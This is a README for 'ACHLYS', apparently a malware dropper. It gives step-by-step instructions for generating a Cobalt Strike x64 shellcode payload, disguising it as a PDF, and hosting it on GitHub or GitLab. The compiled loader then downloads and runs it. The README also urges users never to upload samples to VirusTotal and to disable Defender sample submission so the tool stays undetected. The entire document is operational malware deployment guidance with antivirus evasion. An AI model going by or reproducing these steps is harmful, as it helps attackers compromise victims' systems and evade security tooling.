					  ''ODIN GAVE HIS EYE TO ACQUIRE KNOWLEDGE, BUT IM WILLING TO GIVE FAR MORE''

							

					FIRST OF ALL DONT EVER UPLOAD SAMPLES TO VIRUS TOTAL, OR ANY OTHER WEBSITE THAT WORKS THE SAME 
			                  		     ELSE ACHLYS WILL BE USELESS IN COUPLE OF DAYS
					
					   SECOND IF UR TESTING IT: TURN OFF WINDOWS DEFENDER AUTOMATIC SAMPLE SUBMISSION 
						  && AND ANY OTHER OPTION THAT WORKS THE SAME IN OTHER AVS


							      LUCKILY ACHLYS IS BUILD BY ORCA666


USAGE :

1. first load the profile using the following command: ./teamserver.sh <ur ip address> <ur password> <path to the profile file> .

2. run cobalt strike : ./cobaltstrike.sh .

3. generate ur payload [preferably https] 'but its a must to create it as x64 [c file format]'
   Attacks -> Packages -> Payload Generator .

4. after generating the profile remove the [""] and the [;] and any other thing that is not the actual shellcode ... 
   at the end it should look like [shellcode.txt] file that comes with ACHLYS .

5. after u have ur clean shellcode, run the python script to make it a pdf file :
   python3 sc2pdf.py <ur clean shellcode file that is generated in step 4> <the output name of the pdf>
   Ex: python3 sc2pdf.py shellcode.txt file.pdf

6. now we have shellcode file that is in pdf file format, upload it to a website that allows direct download, and copy the link of the download option.
   Ex: 'raw' / 'download' options in github / gitlab

7. paste ur copied url [from step 6] to line [322] in file [functions.cpp]
   Like so : L"ur url goes here",

8. build the project as [x64] [Release]   --- Note: it wont work if u compiled it as x86 ---

9. enjoy !


feel free to contact orca at : Mr-ORCA666@protonmail.com for any question :)

									
	
							  ACHLYS IS LOADING UR PAYLOAD NOW,
							          NOTHING MORE.
							  MAY U NEED ANOTHER DROPPER ?
							  QUOTH THE RAVEN "NEVERMORE".


